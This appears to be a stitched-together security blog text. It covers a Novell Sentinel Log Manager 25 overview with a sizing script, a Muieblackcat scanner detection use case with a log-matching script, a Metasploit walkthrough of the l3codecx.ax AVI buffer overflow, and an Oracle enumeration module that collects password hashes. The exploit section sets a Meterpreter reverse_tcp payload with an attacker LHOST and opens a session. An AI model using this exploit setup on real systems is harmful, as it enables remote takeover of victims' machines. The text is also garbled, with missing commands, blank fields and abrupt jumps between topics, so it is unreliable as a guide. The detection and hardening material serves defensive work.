Novell provides a free version of its Log Management solution, named Novell Sentinel Log Manager 25. This version is not a trial version, so it is a good occasion to discover this Log Management solution and to get to know the features and limits of the product. You only need to register on the Novell website in order to be allowed to download the free version.
From the Novell Download Center, you will be able to download:
- The latest version of Novell Sentinel Log Manager as an ISO, VMware or Xen image.
- All Sentinel Collectors, which parse the data from a variety of event sources into the normalized Sentinel event structure.
- All Sentinel Connectors, which facilitate the connectivity between Sentinel Collectors and event or data sources.
- Solution Packs, such as “Identity Tracking“, “PCI-DSS“, “SAP” or “Sentinel Core“.
- Action Plug-ins, which are remediation actions that can be triggered by correlation rules, such as “Generic Event Forwarder“, “Create Remedy Ticket“, etc.
- Integrators, which provide integration with external third-party products and can be easily called from Action Plug-ins, such as “Remedy“, “SMTP“, “SOAP“, etc.
- Utilities, which provide additional functionality for Sentinel and/or are commonly used by several other plug-ins.
- The documentation, available online or in PDF format.
Supported Platforms & Browsers
Supported operating systems for the Novell Sentinel Log Manager installation are:
- 64-bit SUSE Linux Enterprise Server 11 SP1 for Sentinel Log Manager versions 1.2 and later.
- SUSE Linux Enterprise Server 10 SP2 (32-bit and 64-bit)
- SUSE Linux Enterprise Server 11 (32-bit and 64-bit)
- SUSE Linux Enterprise Server 11 SP1 (32-bit and 64-bit) for Collector Managers 1.2 and later.
- Windows Server 2003 (32-bit and 64-bit)
- Windows Server 2003 SP2 (32-bit and 64-bit)
- Windows Server 2003 R2 (32-bit and 64-bit)
- Windows Server 2008 (64-bit)
- Windows Server 2008 R2 (64-bit)
Supported virtualization platforms:
- VMware ESX/ESXi 3.5/4.0 or higher
- VMware Player 3 (for demo only)
- Xen 3.1.1
Supported browsers:
- Mozilla Firefox 3.6 for Linux
- Mozilla Firefox 3 for Windows
- Microsoft Internet Explorer 8
Hardware resources:
- 4 GB RAM, since SLES is a 64-bit version
- 48 GB hard disk
- 1 VCPU
Sentinel Collector Managers
The Collector Managers manage all data collection and data parsing for Novell Sentinel Log Manager. One Collector Manager is installed by default during the Sentinel Log Manager installation. However, you can install multiple Collector Managers in a distributed setup, but keep the 25 EPS limit in mind. A Collector Manager communicates with the Novell Sentinel Log Manager on port 61616/TCP. All installed Collectors and Connectors communicate with the Collector Manager and forward the collected data to Novell Sentinel Log Manager for storage and processing.
Connectors facilitate the connectivity between Sentinel Collectors and event or data sources. Each Collector communicates through a specific Connector. Examples of Connectors: Novell Audit, Database, File, LEA, IBM Mainframe, Process, Syslog, SNMP, Windows WMI, etc. You can find a complete list of all supported Connectors by registering on the Novell website.
Collectors are scripts that parse the data from a variety of event sources into the normalized Sentinel event structure, or in some cases collect other forms of data from external data sources. Each Collector must be deployed with a compatible Connector. Novell supports around 100 Collectors, such as Check Point, Cisco, Apache, Microsoft, McAfee, Juniper, etc. All of them are free to use with the 25 EPS version of Novell Sentinel Log Manager. You can find a complete list of all supported Collectors by registering on the Novell website.
Novell Sentinel Log Manager 25 Features, Limitations and Restrictions
- Compression rate of 10:1.
- Unlimited number of Collectors. Allows you to use any Collector without any restriction.
- Unlimited EPS, limited Event Store. Events keep being persisted even if the event view is restricted because the Event Store feature is expired or not licensed.
- Unlimited embedded database. Stores the Sentinel Log Manager configuration data.
- Unlimited usage of the reporting module.
- Authorized network storage (NFS, CIFS, locally mounted SAN).
- EPS rate limited to a maximum of 25 after 60 days, unlimited before. So you will have a maximum of 2 160 000 events per day (25 * 86 400).
- With the VMware or Xen appliance, the 48 GB hard disk represents 480 GB with a 10:1 compression rate. The storage and the compression rate will permit you to store around 1 717 986 918 events ((480 x 1024 x 1024 x 1024) bytes / 300 bytes per event). If you are fully using the 25 EPS rate, you will have a maximum retention of 795.36 days.
- Rules limited to 60 days. You can configure rules to filter events based on one or more of the searchable fields. Each rule can be associated with one or more of the configured actions. After the free license expires, the rules are no longer executed.
- Actions limited to 60 days. You can configure actions to deliver an event to one or more targets when it meets the criteria specified by one of the rules (ex: Email, Log to file, Log to Syslog, Send to Sentinel Link). After the free license expires, the actions are no longer executed.
- Distributed Searches limited to 60 days. Enables you to search events and report event data not only on your local Sentinel Log Manager server, but also on other Sentinel Log Manager servers distributed across the globe. After the free license expires you can still add, modify, and delete the search target configurations. However, only the local event store is used for searches and reports while you are using an expired license. This applies to all distributed searches and reports, even if they were scheduled before the license expired.
- Event Store limited to 60 days. Enables you to view the details of all the events regardless of the EPS rate. The authorized event rate after the license expires is 25 EPS. Any events received while the system averages more than 25 EPS are stored, but the details of those events are not displayed in the search results or reports. These events are tagged with the OverEPSLimit tag.
- Sentinel Link limited to 60 days. Provides the ability to hierarchically link multiple Sentinel systems, including Sentinel Log Manager and the two Sentinel Security Information and Event Management (SIEM) systems, Novell Sentinel and Novell Sentinel Rapid Deployment. After the free license expires, events can no longer be sent or received using Sentinel Link.
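The sizing arithmetic above (events per day, event capacity of the compressed store, and retention at the 25 EPS cap) as a small capacity-planning helper. This is an added example, not code from Novell or from the original post; like the post's formula, it assumes an average stored event size of 300 bytes and counts a GB as 1024^3 bytes, and it generalises to other disk sizes and EPS rates.

```python
# Added example (not from the original post): capacity planning for the free
# Sentinel Log Manager 25 licence, generalising the 25 EPS / 48 GB figures.
# Assumption carried over from the post's formula: 300 bytes per stored event.

SECONDS_PER_DAY = 86_400


def events_per_day(eps: float) -> int:
    """Events received per day at a sustained event rate."""
    return int(eps * SECONDS_PER_DAY)


def event_capacity(disk_gb: int, compression_ratio: float = 10.0,
                   event_bytes: int = 300) -> int:
    """Events that fit on disk once the compression ratio is applied
    (GB taken as 1024^3 bytes, as in the post's formula)."""
    effective_bytes = disk_gb * 1024 ** 3 * compression_ratio
    return int(effective_bytes // event_bytes)


def retention_days(disk_gb: int, eps: float, compression_ratio: float = 10.0,
                   event_bytes: int = 300) -> float:
    """Days of retention before the event store is full at a sustained EPS."""
    capacity = event_capacity(disk_gb, compression_ratio, event_bytes)
    return round(capacity / events_per_day(eps), 2)


def sizing_report(disk_gb: int, eps: float) -> dict:
    """Summary for a given appliance disk size and event rate."""
    return {
        "events_per_day": events_per_day(eps),
        "event_capacity": event_capacity(disk_gb),
        "retention_days": retention_days(disk_gb, eps),
    }


if __name__ == "__main__":
    # The post's figures: 48 GB appliance disk at the 25 EPS cap.
    print(sizing_report(48, 25))
```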
- Use Case Reference: SUC027
- Use Case Title: Muieblackcat setup.php Web Scanner/Robot
- Use Case Detection: IDS / HTTP logs
- Attacker Class: Opportunists
- Attack Sophistication: Unsophisticated
- Identified tool(s): N.D.
- Source IP(s): Random
- Source Countries: Random
- Source Port(s): Random
- Destination Port(s): 80/TCP, 443/TCP
Possible correlations:
- Judging from the logs, this scanner is looking for “setup.php” files.
Emerging Threats SIG 2013115 triggers are:
- The HTTP request should contain “GET /muieblackcat HTTP/1.1“. A complete set of logs is available here.
- The source port can be any port, with traffic from EXTERNAL_NET to HOME_NET on HTTP_PORTS.
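For sites without an IDS, the same two indicators from the use case (the “/muieblackcat” marker request, followed by a sweep for “setup.php” under several paths) can be matched directly in web server access logs. The following is an added example, not part of the original use case; the log lines are constructed in Apache combined format, and the `setup_threshold` parameter and the function names are this example's own.

```python
# Added example (not from the original use case): flag Muieblackcat scanner
# activity in Apache/nginx combined-format access logs. The log lines are
# constructed; the indicators are the ones described in the use case.
import re
from collections import defaultdict

LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) (?P<proto>[^"]+)" (?P<status>\d{3}) \S+'
)

SAMPLE_LOG = """\
203.0.113.7 - - [10/Aug/2011:13:01:02 +0200] "GET /muieblackcat HTTP/1.1" 404 292
203.0.113.7 - - [10/Aug/2011:13:01:03 +0200] "GET //phpMyAdmin/scripts/setup.php HTTP/1.1" 404 305
203.0.113.7 - - [10/Aug/2011:13:01:03 +0200] "GET //pma/scripts/setup.php HTTP/1.1" 404 298
203.0.113.7 - - [10/Aug/2011:13:01:04 +0200] "GET //admin/scripts/setup.php HTTP/1.1" 404 300
198.51.100.4 - - [10/Aug/2011:13:05:17 +0200] "GET /index.html HTTP/1.1" 200 1043
198.51.100.4 - - [10/Aug/2011:13:05:18 +0200] "GET /setup.php HTTP/1.1" 404 290
"""


def parse_line(line):
    """Split one combined-format line into its fields, or None if malformed."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def detect_muieblackcat(log_text, setup_threshold=3):
    """Return {src_ip: [reasons]} for sources matching the use case.

    A source is flagged when it requests /muieblackcat (the ET SIG 2013115
    trigger) or when it probes for setup.php at `setup_threshold` or more
    distinct paths, the scanner's follow-up behaviour. A single setup.php
    request (e.g. a mistyped URL) stays below the threshold."""
    setup_paths = defaultdict(set)
    hits = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if not rec:
            continue
        path = rec["path"].lower()
        if path.rstrip("/") == "/muieblackcat":
            hits[rec["src"]].append("muieblackcat marker request")
        if path.endswith("setup.php"):
            setup_paths[rec["src"]].add(path)
    for src, paths in setup_paths.items():
        if len(paths) >= setup_threshold:
            hits[src].append(f"setup.php sweep over {len(paths)} paths")
    return dict(hits)


if __name__ == "__main__":
    for src, reasons in detect_muieblackcat(SAMPLE_LOG).items():
        print(src, "->", "; ".join(reasons))
```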
Vulnerability discovered by Yamata Li and submitted to Microsoft
Coordinated public release of the vulnerability on 2010-04-13
Metasploit PoC provided on 2011-08-12
PoC provided by:
Affected version(s):
Microsoft Windows 2000 SP4
Windows XP SP2 and SP3
Windows XP Professional x64 SP2
Windows Server 2003 SP2
Windows Server 2003 x64 SP2
Windows Vista, Windows Vista SP1, and Windows Vista SP2
Windows Vista x64, Windows Vista x64 SP1, and Windows Vista x64 SP2
Windows Server 2008 32-bit and Windows Server 2008 32-bit SP2
Windows Server 2008 x64 and Windows Server 2008 x64 SP2
Tested on Windows XP SP3 with:
Internet Explorer 6
This module exploits a buffer overflow in l3codecx.ax while processing AVI files with MPEG Layer-3 audio content. The overflow only allows overwriting with 0's, so the three least significant bytes of the EIP saved on the stack are overwritten, and the shellcode is mapped using the .NET DLL memory technique pioneered by Alexander Sotirov and Mark Dowd. Please note that on IE 8 targets, your malicious URL must be a trusted site in order to load the .NET control.
set SRVHOST 192.168.178.21
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
sessions -i 1
Metasploit provides one useful additional Oracle database auxiliary module, which will permit you to gather information.
You can find all these auxiliary modules through the Metasploit search command.
To invoke this auxiliary module, just type the following command:
This module will scan the Oracle database server to gather different pieces of information:
- Oracle version (select * from v$version)
- All values from v$parameter (select name,value from v$parameter)
- Whether the database audit trail is enabled
- Whether auditing of SYS operations is enabled
- Whether the SQL92 security restriction on SELECT is enabled
- Whether link encryption for logins is enabled
- The UTL directory access configuration
- The audit log directory configuration
- The current account lockout time from the password policy
- The number of failed logins allowed before an account is locked, from the password policy
- The password grace time value from the password policy
- The password lifetime value from the password policy
- The number of times a password can be reused, from the password policy
- The maximum number of times a password needs to be changed before it can be reused, from the password policy
- Whether password complexity is enabled
- A list of all active accounts in the format Username, Hash and Spare4
- A list of all expired or locked accounts in the format Username, Hash and Spare4
- A list of all accounts with DBA privileges in the format Username and Hash
- A list of all accounts with ALTER, JAVA ADMIN, CREATE LIBRARY, CREATE ANY.
- A check of whether default passwords are set up on the database.
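The configuration items the module reports (audit trail, SYS operations auditing, SQL92 security, UTL directory access, and the password-policy limits) are the same ones a DBA checks when hardening the instance. The following is an added example, not the Metasploit module's code: it evaluates those settings against hardening expectations, taking as input the rows a DBA would fetch with `select name, value from v$parameter` and `select resource_name, limit from dba_profiles where profile = 'DEFAULT'`. The two row sets are constructed for the example, and the `assess_oracle` function name is its own.

```python
# Added example (not the Metasploit module's code): evaluate the Oracle
# hardening points the module reports, over rows a DBA would pull with
#   select name, value from v$parameter
#   select resource_name, limit from dba_profiles where profile = 'DEFAULT'
# Both row sets below are constructed for the example.

V_PARAMETER = {  # constructed: name -> value, as returned by v$parameter
    "audit_trail": "NONE",
    "audit_sys_operations": "FALSE",
    "sql92_security": "FALSE",
    "utl_file_dir": "*",
    "audit_file_dest": "/u01/app/oracle/admin/orcl/adump",
}

DEFAULT_PROFILE = {  # constructed: resource_name -> limit, from dba_profiles
    "FAILED_LOGIN_ATTEMPTS": "UNLIMITED",
    "PASSWORD_LOCK_TIME": "1",
    "PASSWORD_GRACE_TIME": "7",
    "PASSWORD_LIFE_TIME": "UNLIMITED",
    "PASSWORD_REUSE_TIME": "UNLIMITED",
    "PASSWORD_REUSE_MAX": "UNLIMITED",
    "PASSWORD_VERIFY_FUNCTION": "NULL",
}


def _is_unlimited(limit):
    """dba_profiles reports an absent limit as UNLIMITED (or NULL for a function)."""
    return limit.upper() in ("UNLIMITED", "NULL")


def assess_oracle(params, profile):
    """Return (setting, finding) tuples for settings that miss the hardening
    expectation; an empty list means every check passed."""
    findings = []
    if params.get("audit_trail", "NONE").upper() == "NONE":
        findings.append(("audit_trail", "database audit trail disabled"))
    if params.get("audit_sys_operations", "FALSE").upper() != "TRUE":
        findings.append(("audit_sys_operations", "SYS operations are not audited"))
    if params.get("sql92_security", "FALSE").upper() != "TRUE":
        findings.append(("sql92_security", "SELECT privilege not required in UPDATE/DELETE predicates"))
    if params.get("utl_file_dir", "") == "*":
        findings.append(("utl_file_dir", "UTL_FILE may read or write any directory"))
    for name in ("FAILED_LOGIN_ATTEMPTS", "PASSWORD_LIFE_TIME", "PASSWORD_REUSE_MAX"):
        if _is_unlimited(profile.get(name, "UNLIMITED")):
            findings.append((name, "no limit set in the DEFAULT profile"))
    if profile.get("PASSWORD_VERIFY_FUNCTION", "NULL").upper() == "NULL":
        findings.append(("PASSWORD_VERIFY_FUNCTION", "password complexity not enforced"))
    return findings


if __name__ == "__main__":
    for setting, finding in assess_oracle(V_PARAMETER, DEFAULT_PROFILE):
        print(f"{setting}: {finding}")
```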